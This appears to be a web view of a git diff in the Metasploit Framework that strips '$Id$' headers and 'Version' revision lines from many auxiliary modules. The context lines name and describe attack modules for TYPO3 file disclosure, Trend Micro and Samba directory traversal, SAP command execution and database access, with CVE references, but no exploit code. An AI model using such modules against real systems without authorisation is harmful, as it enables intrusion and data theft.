This module tests whether a directory traversal vulnerablity is present
|
||||
in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'TYPO3 sa-2009-001 Weak Encryption Key File Disclosure',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module exploits a flaw in TYPO3 encryption ey creation process to allow for
|
||||
file disclosure in the jumpUrl mechanism. This flaw can be used to read any file
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '52048'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.
|
||||
Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'TYPO3 Winstaller default Encryption Keys',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module exploits known default encryption keys found in the TYPO3 Winstaller.
|
||||
This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '40210' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => 'kris katterjohn',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' => [
|
||||
[ 'CVE', '2004-1550' ],
|
||||
[ 'OSVDB', '10232' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'MSB', 'MS08-059' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
supplied.
|
||||
},
|
||||
'Author' => [ 'Carlos Perez <carlos_perez [at] darkoperator.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
end
|
||||
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'tebo <tebo[at]attackresearch.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# Author: Robin Wood <robin@digininja.org> <http://www.digininja.org>
|
||||
# Version: 0.1
|
||||
|
@ -38,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'Robin Wood <robin[at]digininja.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.digininja.org/metasploit/mssql_idf.php' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'tebo <tebo [at] attackresearch [dot] com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.attackresearch.com' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://cisecurity.org/benchmarks.html' ]
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
against a MySQL instance given the appropriate credentials.
|
||||
},
|
||||
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module tests for directory traversal vulnerability in the UpdateAgent
|
||||
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.metasploit.com/users/mc' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
run.
|
||||
},
|
||||
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
end
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-5448' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-1977' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0904' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -23,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.metasploit.com/users/mc' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'CG' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.metasploit.com/users/mc' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => ['MC'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Feb 1 2009'
|
||||
))
|
||||
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '368' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
|
||||
],
|
||||
'Version' => '$Revision$'
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -28,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'URL', 'www.postgresql.org' ]
|
||||
],
|
||||
'Version' => '$Revision$'
|
||||
]
|
||||
))
|
||||
|
||||
#register_options( [ ], self.class) # None needed.
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'SAP Management Console OSExecute',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module allows execution of operating system commands through the SAP
|
||||
Management Console SOAP Interface. A valid username and password must be
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'Luigi Auriemma', 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-1566'],
|
||||
|
|
|
@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Apr 5 2012'
|
||||
))
|
||||
register_options(
|
||||
|
|
|
@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate'=> 'Jan 19 2012'
|
||||
))
|
||||
|
||||
|
|
|
@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Apr 5 2012'
|
||||
))
|
||||
|
||||
|
|
|
@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Jan 19 2012'))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'toto' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2007-6507' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'SMB Scanner Check File/Directory Utility',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module is useful when checking an entire network
|
||||
of SMB hosts for the presence of a known file or directory.
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'SMB Directory Listing Utility',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module lists the directory of a target share and path. The only reason
|
||||
to use this module is if your existing SMB client is not able to support the features
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Samba Symlink Directory Traversal',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module exploits a directory traversal flaw in the Samba
|
||||
CIFS server. To exploit this flaw, a writeable share must be specified.
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'SMB File Upload Utility',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module uploads a file to a target share and path. The only reason
|
||||
to use this module is if your existing SMB client is not able to support the features
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -35,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'jduck' # Ported to MSF v3
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2003-0027'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '30172'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'theLightCosine'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['BID', '17978'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'hdm'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '66842'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'hdm'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '66842'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'hdm'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '66842'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'hdm'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '66842'],
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue